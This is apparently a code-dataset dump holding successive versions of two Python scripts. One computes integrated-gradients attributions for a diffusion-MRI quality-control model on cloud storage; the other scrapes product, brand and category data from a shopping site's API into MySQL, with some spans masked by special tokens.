tf.keras.mixed_precision.set_global_policy('mixed_float16')\n scope = strategy.scope()\n GCS_BASE_PATH = f'gs://{gcs_bucket}/{model_dir}/seed_{dataset_seed}'\n GCS_SAVED_MODEL_DIR = op.join(GCS_BASE_PATH, 'saved_model')\n GCS_OUTPUT_DIR = op.join(GCS_BASE_PATH, 'integrated_gradients')\n fs = gcsfs.GCSFileSystem()\n LOCAL_SAVED_MODEL_DIR = 'saved_model'\n LOCAL_OUTPUT_DIR = 'output'\n os.makedirs(LOCAL_SAVED_MODEL_DIR, exist_ok=True)\n os.makedirs(LOCAL_OUTPUT_DIR, exist_ok=True)\n fs.get(GCS_SAVED_MODEL_DIR, LOCAL_SAVED_MODEL_DIR, recursive=True)\n GCS_DATA_PATH = f'gs://{gcs_bucket}'\n GCS_ALLDATA_DIR = op.join(GCS_DATA_PATH, 'tfrecs', dataset_name, 'all-data'\n )\n if use_tpu:\n device_alldata_dir = GCS_ALLDATA_DIR\n else:\n LOCAL_ALLDATA_DIR = op.join('.', 'tfrecs', dataset_name, 'all-data')\n os.makedirs(LOCAL_ALLDATA_DIR, exist_ok=True)\n fs.get(GCS_ALLDATA_DIR, LOCAL_ALLDATA_DIR, recursive=True)\n device_alldata_dir = LOCAL_ALLDATA_DIR\n volume_shape = 128, 128, 128, n_channels\n element_spec = tf.TensorSpec(shape=(), dtype=tf.int64, name=None), (tf.\n TensorSpec(shape=(1, 128, 
128, 128, 5), dtype=tf.float32, name=None\n ), tf.TensorSpec(shape=(1,), dtype=tf.float32, name=None))\n dataset = tf.data.experimental.load(op.join(device_alldata_dir,\n confusion_class), element_spec=element_spec)\n volumes = [tf.squeeze(tensor[0]) for _, tensor in dataset]\n baseline = tf.zeros(shape=volume_shape, dtype=tf.float32)\n print('Computing integrated gradients')\n with scope:\n model = tf.keras.models.load_model(LOCAL_SAVED_MODEL_DIR)\n ig_attributions = [integrated_gradients(model=model, baseline=\n baseline, image=volume, target_class=target_class, m_steps=128,\n batch_size=1) for volume in volumes]\n if target_class == 1:\n postfix = 'attribution_pass'\n else:\n postfix = 'attribution_fail'\n ig_dataset = tf.data.Dataset.from_tensor_slices(tf.stack(ig_attributions))\n tf.data.experimental.save(ig_dataset, op.join(LOCAL_OUTPUT_DIR,\n f'ig_{confusion_class}_{postfix}'))\n affine = np.diag([1, 1, 1, 1])\n volume_niftis = [{'b0': nib.Nifti1Image(volume[:, :, :, 3].numpy(),\n affine), 'color_fa': nib.Nifti1Image(volume[:, :, :, :3].numpy(),\n affine)} for volume in volumes]\n ig_niftis = [{'b0': nib.Nifti1Image(attribution[:, :, :, 3].numpy(),\n affine), 'color_fa': nib.Nifti1Image(attribution[:, :, :, :3].numpy\n (), affine), 'sum': nib.Nifti1Image(tf.math.reduce_sum(attribution[\n :, :, :, :4], axis=-1).numpy(), affine)} for attribution in\n ig_attributions]\n for idx, (volume_nifti, ig_nifti) in enumerate(zip(volume_niftis,\n ig_niftis)):\n for key, value in volume_nifti.items():\n nib.save(value, op.join(LOCAL_OUTPUT_DIR,\n f'{confusion_class}_{key}_{idx}.nii.gz'))\n for key, value in ig_nifti.items():\n nib.save(value, op.join(LOCAL_OUTPUT_DIR,\n f'{confusion_class}_{postfix}_{key}_{idx}.nii.gz'))\n fs.put(LOCAL_OUTPUT_DIR, GCS_OUTPUT_DIR, recursive=True)\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('--gcs_bucket', type=str, help=\n 'The name of the gcs bucket that will contain the saved models, checkpoints, etc.'\n )\n parser.add_argument('--n_channels', type=int, help=\n 'The number of channels in the data.', default=5)\n parser.add_argument('--dataset_name', type=str, help=\n 'The name of the dataset in the tfrecs folder of the GCS bucket.',\n default='b0-tensorfa-dwiqc')\n parser.add_argument('--model_dir', type=str, help=\n 'The name of the GCS directory in which the tensorflow model is saved.'\n , default='b0_tensorfa_dwiqc')\n parser.add_argument('--dataset_seed', type=int, help=\n 'The seed for the dataset', default=8)\n parser.add_argument('--target_class', type=int, help=\n 'The target class for the integrated gradients.', default=1)\n parser.add_argument('--confusion_class', type=str, help=\n 'The confusion class for which to compute integrated gradients',\n default='true_pos')\n args = parser.parse_args()\n main(gcs_bucket=args.gcs_bucket, n_channels=args.n_channels,\n dataset_name=args.dataset_name, model_dir=args.model_dir,\n dataset_seed=args.dataset_seed, target_class=args.target_class,\n confusion_class=args.confusion_class)\n",
"step-4": "import argparse\nimport gc\nimport gcsfs\nimport nibabel as nib\nimport nilearn\nimport nobrainer\nimport numpy as np\nimport os\nimport os.path as op\nimport pandas as pd\nimport tensorflow as tf\n\n\ndef interpolate_images(baseline, image, alphas):\n alphas_x = alphas[:, tf.newaxis, tf.newaxis, tf.newaxis, tf.newaxis]\n baseline_x = tf.expand_dims(baseline, axis=0)\n input_x = tf.expand_dims(image, axis=0)\n delta = input_x - baseline_x\n images = baseline_x + alphas_x * delta\n return images\n\n\ndef compute_gradients(model, images, target_class):\n with tf.GradientTape() as tape:\n tape.watch(images)\n raw_probs = model(images)\n probs = (1 - raw_probs) * (1 - target_class) + raw_probs * target_class\n gradients = tape.gradient(probs, images)\n return gradients\n\n\ndef integral_approximation(gradients):\n grads = (gradients[:-1] + gradients[1:]) / tf.constant(2.0)\n return tf.math.reduce_mean(grads, axis=0)\n\n\n@tf.function\ndef integrated_gradients(model, baseline, image, target_class, m_steps=50,\n batch_size=32):\n alphas = tf.linspace(start=0.0, stop=1.0, num=m_steps + 1)\n gradient_batches = tf.TensorArray(tf.float32, size=m_steps + 1)\n for alpha in tf.range(0, len(alphas), batch_size):\n from_ = alpha\n to = tf.minimum(from_ + batch_size, len(alphas))\n alpha_batch = alphas[from_:to]\n interpolated_path_input_batch = interpolate_images(baseline=\n baseline, image=image, alphas=alpha_batch)\n gradient_batch = compute_gradients(model=model, images=\n interpolated_path_input_batch, target_class=target_class)\n gradient_batches = gradient_batches.scatter(tf.range(from_, to),\n gradient_batch)\n total_gradients = gradient_batches.stack()\n avg_gradients = integral_approximation(gradients=total_gradients)\n return (image - baseline) * avg_gradients\n\n\ndef main(gcs_bucket, n_channels=5, dataset_name='b0-tensorfa-dwiqc',\n model_dir='b0_tensorfa_dwiqc', dataset_seed=8, target_class=1,\n confusion_class='true_pos'):\n print('Setting gpu thread mode to gpu_private.')\n os.environ['TF_GPU_THREAD_MODE'] = 'gpu_private'\n print('Configuring distribution strategy')\n use_tpu = False\n try:\n resolver = tf.distribute.cluster_resolver.TPUClusterResolver(tpu='')\n tf.config.experimental_connect_to_cluster(resolver)\n tf.tpu.experimental.initialize_tpu_system(resolver)\n strategy = tf.distribute.TPUStrategy(resolver)\n use_tpu = True\n print('TPU detected.')\n print('All devices: ', tf.config.list_logical_devices('TPU'))\n except ValueError:\n strategy = tf.distribute.MirroredStrategy()\n print('GPUs detected.')\n print('Number of accelerators: ', strategy.num_replicas_in_sync)\n tf.keras.mixed_precision.set_global_policy('mixed_float16')\n scope = strategy.scope()\n GCS_BASE_PATH = f'gs://{gcs_bucket}/{model_dir}/seed_{dataset_seed}'\n GCS_SAVED_MODEL_DIR = op.join(GCS_BASE_PATH, 'saved_model')\n GCS_OUTPUT_DIR = op.join(GCS_BASE_PATH, 'integrated_gradients')\n fs = gcsfs.GCSFileSystem()\n LOCAL_SAVED_MODEL_DIR = 'saved_model'\n LOCAL_OUTPUT_DIR = 'output'\n os.makedirs(LOCAL_SAVED_MODEL_DIR, exist_ok=True)\n os.makedirs(LOCAL_OUTPUT_DIR, exist_ok=True)\n fs.get(GCS_SAVED_MODEL_DIR, LOCAL_SAVED_MODEL_DIR, recursive=True)\n GCS_DATA_PATH = f'gs://{gcs_bucket}'\n GCS_ALLDATA_DIR = op.join(GCS_DATA_PATH, 'tfrecs', dataset_name, 'all-data'\n )\n if use_tpu:\n device_alldata_dir = GCS_ALLDATA_DIR\n else:\n LOCAL_ALLDATA_DIR = op.join('.', 'tfrecs', dataset_name, 'all-data')\n os.makedirs(LOCAL_ALLDATA_DIR, exist_ok=True)\n fs.get(GCS_ALLDATA_DIR, LOCAL_ALLDATA_DIR, recursive=True)\n 
device_alldata_dir = LOCAL_ALLDATA_DIR\n volume_shape = 128, 128, 128, n_channels\n element_spec = tf.TensorSpec(shape=(), dtype=tf.int64, name=None), (tf.\n TensorSpec(shape=(1, 128, 128, 128, 5), dtype=tf.float32, name=None\n ), tf.TensorSpec(shape=(1,), dtype=tf.float32, name=None))\n dataset = tf.data.experimental.load(op.join(device_alldata_dir,\n confusion_class), element_spec=element_spec)\n volumes = [tf.squeeze(tensor[0]) for _, tensor in dataset]\n baseline = tf.zeros(shape=volume_shape, dtype=tf.float32)\n print('Computing integrated gradients')\n with scope:\n model = tf.keras.models.load_model(LOCAL_SAVED_MODEL_DIR)\n ig_attributions = [integrated_gradients(model=model, baseline=\n baseline, image=volume, target_class=target_class, m_steps=128,\n batch_size=1) for volume in volumes]\n if target_class == 1:\n postfix = 'attribution_pass'\n else:\n postfix = 'attribution_fail'\n ig_dataset = tf.data.Dataset.from_tensor_slices(tf.stack(ig_attributions))\n tf.data.experimental.save(ig_dataset, op.join(LOCAL_OUTPUT_DIR,\n f'ig_{confusion_class}_{postfix}'))\n affine = np.diag([1, 1, 1, 1])\n volume_niftis = [{'b0': nib.Nifti1Image(volume[:, :, :, 3].numpy(),\n affine), 'color_fa': nib.Nifti1Image(volume[:, :, :, :3].numpy(),\n affine)} for volume in volumes]\n ig_niftis = [{'b0': nib.Nifti1Image(attribution[:, :, :, 3].numpy(),\n affine), 'color_fa': nib.Nifti1Image(attribution[:, :, :, :3].numpy\n (), affine), 'sum': nib.Nifti1Image(tf.math.reduce_sum(attribution[\n :, :, :, :4], axis=-1).numpy(), affine)} for attribution in\n ig_attributions]\n for idx, (volume_nifti, ig_nifti) in enumerate(zip(volume_niftis,\n ig_niftis)):\n for key, value in volume_nifti.items():\n nib.save(value, op.join(LOCAL_OUTPUT_DIR,\n f'{confusion_class}_{key}_{idx}.nii.gz'))\n for key, value in ig_nifti.items():\n nib.save(value, op.join(LOCAL_OUTPUT_DIR,\n f'{confusion_class}_{postfix}_{key}_{idx}.nii.gz'))\n fs.put(LOCAL_OUTPUT_DIR, GCS_OUTPUT_DIR, recursive=True)\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('--gcs_bucket', type=str, help=\n 'The name of the gcs bucket that will contain the saved models, checkpoints, etc.'\n )\n parser.add_argument('--n_channels', type=int, help=\n 'The number of channels in the data.', default=5)\n parser.add_argument('--dataset_name', type=str, help=\n 'The name of the dataset in the tfrecs folder of the GCS bucket.',\n default='b0-tensorfa-dwiqc')\n parser.add_argument('--model_dir', type=str, help=\n 'The name of the GCS directory in which the tensorflow model is saved.'\n , default='b0_tensorfa_dwiqc')\n parser.add_argument('--dataset_seed', type=int, help=\n 'The seed for the dataset', default=8)\n parser.add_argument('--target_class', type=int, help=\n 'The target class for the integrated gradients.', default=1)\n parser.add_argument('--confusion_class', type=str, help=\n 'The confusion class for which to compute integrated gradients',\n default='true_pos')\n args = parser.parse_args()\n main(gcs_bucket=args.gcs_bucket, n_channels=args.n_channels,\n dataset_name=args.dataset_name, model_dir=args.model_dir,\n dataset_seed=args.dataset_seed, target_class=args.target_class,\n confusion_class=args.confusion_class)\n",
"step-5": "import argparse\nimport gc\nimport gcsfs\nimport nibabel as nib\nimport nilearn\nimport nobrainer\nimport numpy as np\nimport os\nimport os.path as op\nimport pandas as pd\nimport tensorflow as tf\n\n\ndef interpolate_images(baseline, image, alphas):\n alphas_x = alphas[:, tf.newaxis, tf.newaxis, tf.newaxis, tf.newaxis]\n baseline_x = tf.expand_dims(baseline, axis=0)\n input_x = tf.expand_dims(image, axis=0)\n delta = input_x - baseline_x\n images = baseline_x + alphas_x * delta\n return images\n\n\ndef compute_gradients(model, images, target_class):\n with tf.GradientTape() as tape:\n tape.watch(images)\n raw_probs = model(images)\n probs = (1 - raw_probs) * (1 - target_class) + raw_probs * target_class\n\n gradients = tape.gradient(probs, images)\n return gradients\n\n\ndef integral_approximation(gradients):\n # riemann_trapezoidal\n grads = (gradients[:-1] + gradients[1:]) / tf.constant(2.0)\n return tf.math.reduce_mean(grads, axis=0)\n\n\n@tf.function\ndef integrated_gradients(\n model, baseline, image, target_class, m_steps=50, batch_size=32\n):\n # 1. Generate alphas.\n alphas = tf.linspace(start=0.0, stop=1.0, num=m_steps + 1)\n\n # Initialize TensorArray outside loop to collect gradients.\n gradient_batches = tf.TensorArray(tf.float32, size=m_steps + 1)\n\n # Iterate alphas range and batch computation for speed, memory efficiency, and scaling to larger m_steps.\n for alpha in tf.range(0, len(alphas), batch_size):\n from_ = alpha\n to = tf.minimum(from_ + batch_size, len(alphas))\n alpha_batch = alphas[from_:to]\n\n # 2. Generate interpolated inputs between baseline and input.\n interpolated_path_input_batch = interpolate_images(\n baseline=baseline, image=image, alphas=alpha_batch\n )\n\n # 3. Compute gradients between model outputs and interpolated inputs.\n gradient_batch = compute_gradients(\n model=model,\n images=interpolated_path_input_batch,\n target_class=target_class,\n )\n\n # Write batch indices and gradients to extend TensorArray.\n gradient_batches = gradient_batches.scatter(tf.range(from_, to), gradient_batch)\n\n # Stack path gradients together row-wise into single tensor.\n total_gradients = gradient_batches.stack()\n\n # 4. Integral approximation through averaging gradients.\n avg_gradients = integral_approximation(gradients=total_gradients)\n\n # 5. 
Scale integrated gradients with respect to input.\n return (image - baseline) * avg_gradients\n\n\ndef main(\n gcs_bucket,\n n_channels=5,\n dataset_name=\"b0-tensorfa-dwiqc\",\n model_dir=\"b0_tensorfa_dwiqc\",\n dataset_seed=8,\n target_class=1,\n confusion_class=\"true_pos\",\n):\n print(\"Setting gpu thread mode to gpu_private.\")\n os.environ[\"TF_GPU_THREAD_MODE\"] = \"gpu_private\"\n\n print(\"Configuring distribution strategy\")\n use_tpu = False\n\n try:\n resolver = tf.distribute.cluster_resolver.TPUClusterResolver(tpu=\"\")\n tf.config.experimental_connect_to_cluster(resolver)\n # This is the TPU initialization code that has to be at the beginning.\n tf.tpu.experimental.initialize_tpu_system(resolver)\n strategy = tf.distribute.TPUStrategy(resolver)\n\n use_tpu = True\n print(\"TPU detected.\")\n print(\"All devices: \", tf.config.list_logical_devices(\"TPU\"))\n except ValueError:\n strategy = tf.distribute.MirroredStrategy()\n print(\"GPUs detected.\")\n print(\"Number of accelerators: \", strategy.num_replicas_in_sync)\n\n # Train using mixed-precision policy\n tf.keras.mixed_precision.set_global_policy(\"mixed_float16\")\n\n scope = strategy.scope()\n\n # Setting location were training logs and checkpoints will be stored\n GCS_BASE_PATH = f\"gs://{gcs_bucket}/{model_dir}/seed_{dataset_seed}\"\n GCS_SAVED_MODEL_DIR = op.join(GCS_BASE_PATH, \"saved_model\")\n GCS_OUTPUT_DIR = op.join(GCS_BASE_PATH, \"integrated_gradients\")\n\n fs = gcsfs.GCSFileSystem()\n\n LOCAL_SAVED_MODEL_DIR = \"saved_model\"\n LOCAL_OUTPUT_DIR = \"output\"\n os.makedirs(LOCAL_SAVED_MODEL_DIR, exist_ok=True)\n os.makedirs(LOCAL_OUTPUT_DIR, exist_ok=True)\n\n fs.get(GCS_SAVED_MODEL_DIR, LOCAL_SAVED_MODEL_DIR, recursive=True)\n\n # Specify the datasets on GCP storage\n GCS_DATA_PATH = f\"gs://{gcs_bucket}\"\n GCS_ALLDATA_DIR = op.join(GCS_DATA_PATH, \"tfrecs\", dataset_name, \"all-data\")\n\n if use_tpu:\n device_alldata_dir = GCS_ALLDATA_DIR\n else:\n LOCAL_ALLDATA_DIR = op.join(\".\", \"tfrecs\", dataset_name, \"all-data\")\n os.makedirs(LOCAL_ALLDATA_DIR, exist_ok=True)\n fs.get(GCS_ALLDATA_DIR, LOCAL_ALLDATA_DIR, recursive=True)\n device_alldata_dir = LOCAL_ALLDATA_DIR\n\n volume_shape = (128, 128, 128, n_channels)\n element_spec = (\n tf.TensorSpec(shape=(), dtype=tf.int64, name=None),\n (\n tf.TensorSpec(shape=(1, 128, 128, 128, 5), dtype=tf.float32, name=None),\n tf.TensorSpec(shape=(1,), dtype=tf.float32, name=None),\n ),\n )\n\n dataset = tf.data.experimental.load(\n op.join(device_alldata_dir, confusion_class),\n element_spec=element_spec,\n )\n volumes = [tf.squeeze(tensor[0]) for _, tensor in dataset]\n baseline = tf.zeros(shape=volume_shape, dtype=tf.float32)\n\n print(\"Computing integrated gradients\")\n\n with scope:\n model = tf.keras.models.load_model(LOCAL_SAVED_MODEL_DIR)\n\n ig_attributions = [\n integrated_gradients(\n model=model,\n baseline=baseline,\n image=volume,\n target_class=target_class,\n m_steps=128,\n batch_size=1,\n )\n for volume in volumes\n ]\n\n if target_class == 1:\n postfix = \"attribution_pass\"\n else:\n postfix = \"attribution_fail\"\n\n ig_dataset = tf.data.Dataset.from_tensor_slices(tf.stack(ig_attributions))\n tf.data.experimental.save(\n ig_dataset,\n op.join(LOCAL_OUTPUT_DIR, f\"ig_{confusion_class}_{postfix}\"),\n )\n\n affine = np.diag([1, 1, 1, 1])\n volume_niftis = [\n {\n \"b0\": nib.Nifti1Image(volume[:, :, :, 3].numpy(), affine),\n \"color_fa\": nib.Nifti1Image(volume[:, :, :, :3].numpy(), affine),\n }\n for volume in volumes\n ]\n ig_niftis = [\n {\n 
\"b0\": nib.Nifti1Image(attribution[:, :, :, 3].numpy(), affine),\n \"color_fa\": nib.Nifti1Image(attribution[:, :, :, :3].numpy(), affine),\n \"sum\": nib.Nifti1Image(\n tf.math.reduce_sum(attribution[:, :, :, :4], axis=-1).numpy(), affine\n ),\n }\n for attribution in ig_attributions\n ]\n\n for idx, (volume_nifti, ig_nifti) in enumerate(zip(volume_niftis, ig_niftis)):\n for key, value in volume_nifti.items():\n nib.save(\n value,\n op.join(LOCAL_OUTPUT_DIR, f\"{confusion_class}_{key}_{idx}.nii.gz\"),\n )\n\n for key, value in ig_nifti.items():\n nib.save(\n value,\n op.join(\n LOCAL_OUTPUT_DIR, f\"{confusion_class}_{postfix}_{key}_{idx}.nii.gz\"\n ),\n )\n\n fs.put(LOCAL_OUTPUT_DIR, GCS_OUTPUT_DIR, recursive=True)\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument(\n \"--gcs_bucket\",\n type=str,\n help=(\n \"The name of the gcs bucket that will contain the saved models, \"\n \"checkpoints, etc.\"\n ),\n )\n parser.add_argument(\n \"--n_channels\",\n type=int,\n help=\"The number of channels in the data.\",\n default=5,\n )\n parser.add_argument(\n \"--dataset_name\",\n type=str,\n help=\"The name of the dataset in the tfrecs folder of the GCS bucket.\",\n default=\"b0-tensorfa-dwiqc\",\n )\n parser.add_argument(\n \"--model_dir\",\n type=str,\n help=\"The name of the GCS directory in which the tensorflow model is saved.\",\n default=\"b0_tensorfa_dwiqc\",\n )\n parser.add_argument(\n \"--dataset_seed\",\n type=int,\n help=\"The seed for the dataset\",\n default=8,\n )\n parser.add_argument(\n \"--target_class\",\n type=int,\n help=\"The target class for the integrated gradients.\",\n default=1,\n )\n parser.add_argument(\n \"--confusion_class\",\n type=str,\n help=\"The confusion class for which to compute integrated gradients\",\n default=\"true_pos\",\n )\n\n args = parser.parse_args()\n\n main(\n gcs_bucket=args.gcs_bucket,\n n_channels=args.n_channels,\n dataset_name=args.dataset_name,\n model_dir=args.model_dir,\n dataset_seed=args.dataset_seed,\n target_class=args.target_class,\n confusion_class=args.confusion_class,\n )\n",
"step-ids": [
4,
5,
6,
7,
8
]
}
|
[
4,
5,
6,
7,
8
] |
<|reserved_special_token_0|>
def insert_category(conn):
"""将商品的种类插入数据库 """
categories_dict = {(66): '手机', (327): '腕表配饰', (65): '电脑办公', (67):
'相机单反', (217): '平板数码', (179): '运动户外', (255): '家电家居', (1000): '其他'}
with conn.cursor() as cursor:
for category_id, category_name in categories_dict.items():
sql = (
'insert into goods_category (category_id, category_name, create_time) values (%s, %s, %s)'
)
t = datetime.datetime.now()
create_time = datetime.datetime.strftime(t, '%Y-%m-%d %H:%M:%S')
result = cursor.execute(sql, (category_id, category_name,
create_time))
conn.commit()
def insert_brand(conn):
"""将商品的品牌插入数据库"""
brand_list = []
category_id_list = [66, 327, 65, 67, 217, 179, 255]
for category_id in category_id_list:
try:
brand_url = (
'https://channel.fenqile.com/product/query_filter_list.json?line_type=category_id_1&category_id={category_id}'
)
res = requests.get(brand_url.format(category_id=category_id))
brands = json.loads(res.content.decode('utf-8')).get('brand_list')
brand_list += brands
except:
            print('Error: category_id:', category_id)
print()
continue
key_words = ['brand_id', 'brand_name', 'brand_name_ch', 'brand_name_en',
'category_id_1']
sql = 'insert into goods_brand values (%s, %s, %s, %s, %s, %s)'
with conn.cursor() as cursor:
brand_set = set()
for brand in brand_list:
brand_id = int(brand.get('brand_id'))
print(brand_id)
if brand_id not in brand_set:
t = datetime.datetime.now()
create_time = datetime.datetime.strftime(t, '%Y-%m-%d %H:%M:%S'
)
brand_name = brand.get('brand_name')
brand_name_ch = brand.get('brand_name_ch') if brand.get(
'brand_name_ch') else brand_name
brand_name_en = brand.get('brand_name_en') if brand.get(
'brand_name_en') else brand_name
category_id = int(brand.get('category_id_1'))
category_id = (category_id if category_id in
category_id_list else 1000)
result = cursor.execute(sql, (brand_id, create_time,
brand_name, brand_name_ch, brand_name_en, category_id))
print(result)
conn.commit()
brand_set.add(brand_id)
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def insert_category(conn):
"""将商品的种类插入数据库 """
categories_dict = {(66): '手机', (327): '腕表配饰', (65): '电脑办公', (67):
'相机单反', (217): '平板数码', (179): '运动户外', (255): '家电家居', (1000): '其他'}
with conn.cursor() as cursor:
for category_id, category_name in categories_dict.items():
sql = (
'insert into goods_category (category_id, category_name, create_time) values (%s, %s, %s)'
)
t = datetime.datetime.now()
create_time = datetime.datetime.strftime(t, '%Y-%m-%d %H:%M:%S')
result = cursor.execute(sql, (category_id, category_name,
create_time))
conn.commit()
def insert_brand(conn):
"""将商品的品牌插入数据库"""
brand_list = []
category_id_list = [66, 327, 65, 67, 217, 179, 255]
for category_id in category_id_list:
try:
brand_url = (
'https://channel.fenqile.com/product/query_filter_list.json?line_type=category_id_1&category_id={category_id}'
)
res = requests.get(brand_url.format(category_id=category_id))
brands = json.loads(res.content.decode('utf-8')).get('brand_list')
brand_list += brands
except:
            print('Error: category_id:', category_id)
print()
continue
key_words = ['brand_id', 'brand_name', 'brand_name_ch', 'brand_name_en',
'category_id_1']
sql = 'insert into goods_brand values (%s, %s, %s, %s, %s, %s)'
with conn.cursor() as cursor:
brand_set = set()
for brand in brand_list:
brand_id = int(brand.get('brand_id'))
print(brand_id)
if brand_id not in brand_set:
t = datetime.datetime.now()
create_time = datetime.datetime.strftime(t, '%Y-%m-%d %H:%M:%S'
)
brand_name = brand.get('brand_name')
brand_name_ch = brand.get('brand_name_ch') if brand.get(
'brand_name_ch') else brand_name
brand_name_en = brand.get('brand_name_en') if brand.get(
'brand_name_en') else brand_name
category_id = int(brand.get('category_id_1'))
category_id = (category_id if category_id in
category_id_list else 1000)
result = cursor.execute(sql, (brand_id, create_time,
brand_name, brand_name_ch, brand_name_en, category_id))
print(result)
conn.commit()
brand_set.add(brand_id)
def insert_goods(conn, GOODS):
"""将商品信息插入数据库"""
kws = ('product_name', 'category_id_1', 'brand_id', 'product_desc',
'short_product_name', 'sku_key_1', 'sku_key_2', 'sku_key_3',
'product_flag', 'min_firstpay', 'is_product_up_down', 'real_amount',
'mart_amount', 'fq_num', 'product_info', 'delivery_time',
'gift_list', 'fe_params', 'slider_imgs', 'detail_imgs', 'create_time')
sql = (
'insert into goods (good_name,category_id,brand_id,product_name,short_product_name,sku_key_1,sku_key_2,sku_key_3,product_flag,min_firstpay,is_product_up_down,real_amount,mart_amount,fq_num,product_info,delivery_time,gift_list,fe_params,slider_imgs,detail_imgs,create_time) values (%s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s)'
)
goods = GOODS.find()
for good in goods:
try:
data = []
for kw in kws[:-5]:
info = good['detail_data'].get(kw)
data.append(info)
gift_list = ' '.join([str(s) for s in good['detail_data'].get(
'gift_list')[-1].values()])
data.append(gift_list)
fe_params = json.dumps(good['detail_data'].get('fe_params'))
data.append(fe_params)
slider_imgs = '||'.join(good['slider_imgs'])
data.append(slider_imgs)
detail_imgs = '||'.join(good['detail_imgs'])
data.append(detail_imgs)
t = datetime.datetime.now()
create_time = datetime.datetime.strftime(t, '%Y-%m-%d %H:%M:%S')
data.append(create_time)
with conn.cursor() as cursor:
cursor.execute('select brand_id from goods_brand')
all_brand_ids = [brand_id[0] for brand_id in cursor.fetchall()]
cursor.execute('select category_id from goods_category')
all_category_ids = [category_id[0] for category_id in
cursor.fetchall()]
data[1] = data[1] if data[1] else 1000
data[2] = data[2] if data[2] else 10000
data[1] = 1000 if int(data[1]
) not in all_category_ids else int(data[1])
data[2] = 10000 if int(data[2]) not in all_brand_ids else int(
data[2])
cursor.execute(sql, tuple(data))
conn.commit()
except Exception as e:
print(e)
continue
def main():
conn = pymysql.connect(host='127.0.0.1', port=3306, user='root',
password='123456', db='test', charset='utf8', autocommit=False)
CONN = pymongo.MongoClient(host='10.7.152.75', port=27017)
GOODS = CONN['fenqile']['goods']
insert_goods(conn, GOODS)
conn.close()
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def insert_category(conn):
"""将商品的种类插入数据库 """
categories_dict = {(66): '手机', (327): '腕表配饰', (65): '电脑办公', (67):
'相机单反', (217): '平板数码', (179): '运动户外', (255): '家电家居', (1000): '其他'}
with conn.cursor() as cursor:
for category_id, category_name in categories_dict.items():
sql = (
'insert into goods_category (category_id, category_name, create_time) values (%s, %s, %s)'
)
t = datetime.datetime.now()
create_time = datetime.datetime.strftime(t, '%Y-%m-%d %H:%M:%S')
result = cursor.execute(sql, (category_id, category_name,
create_time))
conn.commit()
def insert_brand(conn):
"""将商品的品牌插入数据库"""
brand_list = []
category_id_list = [66, 327, 65, 67, 217, 179, 255]
for category_id in category_id_list:
try:
brand_url = (
'https://channel.fenqile.com/product/query_filter_list.json?line_type=category_id_1&category_id={category_id}'
)
res = requests.get(brand_url.format(category_id=category_id))
brands = json.loads(res.content.decode('utf-8')).get('brand_list')
brand_list += brands
except:
            print('Error: category_id:', category_id)
print()
continue
key_words = ['brand_id', 'brand_name', 'brand_name_ch', 'brand_name_en',
'category_id_1']
sql = 'insert into goods_brand values (%s, %s, %s, %s, %s, %s)'
with conn.cursor() as cursor:
brand_set = set()
for brand in brand_list:
brand_id = int(brand.get('brand_id'))
print(brand_id)
if brand_id not in brand_set:
t = datetime.datetime.now()
create_time = datetime.datetime.strftime(t, '%Y-%m-%d %H:%M:%S'
)
brand_name = brand.get('brand_name')
brand_name_ch = brand.get('brand_name_ch') if brand.get(
'brand_name_ch') else brand_name
brand_name_en = brand.get('brand_name_en') if brand.get(
'brand_name_en') else brand_name
category_id = int(brand.get('category_id_1'))
category_id = (category_id if category_id in
category_id_list else 1000)
result = cursor.execute(sql, (brand_id, create_time,
brand_name, brand_name_ch, brand_name_en, category_id))
print(result)
conn.commit()
brand_set.add(brand_id)
def insert_goods(conn, GOODS):
"""将商品信息插入数据库"""
kws = ('product_name', 'category_id_1', 'brand_id', 'product_desc',
'short_product_name', 'sku_key_1', 'sku_key_2', 'sku_key_3',
'product_flag', 'min_firstpay', 'is_product_up_down', 'real_amount',
'mart_amount', 'fq_num', 'product_info', 'delivery_time',
'gift_list', 'fe_params', 'slider_imgs', 'detail_imgs', 'create_time')
sql = (
'insert into goods (good_name,category_id,brand_id,product_name,short_product_name,sku_key_1,sku_key_2,sku_key_3,product_flag,min_firstpay,is_product_up_down,real_amount,mart_amount,fq_num,product_info,delivery_time,gift_list,fe_params,slider_imgs,detail_imgs,create_time) values (%s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s)'
)
goods = GOODS.find()
for good in goods:
try:
data = []
for kw in kws[:-5]:
info = good['detail_data'].get(kw)
data.append(info)
gift_list = ' '.join([str(s) for s in good['detail_data'].get(
'gift_list')[-1].values()])
data.append(gift_list)
fe_params = json.dumps(good['detail_data'].get('fe_params'))
data.append(fe_params)
slider_imgs = '||'.join(good['slider_imgs'])
data.append(slider_imgs)
detail_imgs = '||'.join(good['detail_imgs'])
data.append(detail_imgs)
t = datetime.datetime.now()
create_time = datetime.datetime.strftime(t, '%Y-%m-%d %H:%M:%S')
data.append(create_time)
with conn.cursor() as cursor:
cursor.execute('select brand_id from goods_brand')
all_brand_ids = [brand_id[0] for brand_id in cursor.fetchall()]
cursor.execute('select category_id from goods_category')
all_category_ids = [category_id[0] for category_id in
cursor.fetchall()]
data[1] = data[1] if data[1] else 1000
data[2] = data[2] if data[2] else 10000
data[1] = 1000 if int(data[1]
) not in all_category_ids else int(data[1])
data[2] = 10000 if int(data[2]) not in all_brand_ids else int(
data[2])
cursor.execute(sql, tuple(data))
conn.commit()
except Exception as e:
print(e)
continue
def main():
conn = pymysql.connect(host='127.0.0.1', port=3306, user='root',
password='123456', db='test', charset='utf8', autocommit=False)
CONN = pymongo.MongoClient(host='10.7.152.75', port=27017)
GOODS = CONN['fenqile']['goods']
insert_goods(conn, GOODS)
conn.close()
if __name__ == '__main__':
main()
<|reserved_special_token_1|>
import json
import datetime
import requests
import pymysql
import pymongo
def insert_category(conn):
"""将商品的种类插入数据库 """
categories_dict = {(66): '手机', (327): '腕表配饰', (65): '电脑办公', (67):
'相机单反', (217): '平板数码', (179): '运动户外', (255): '家电家居', (1000): '其他'}
with conn.cursor() as cursor:
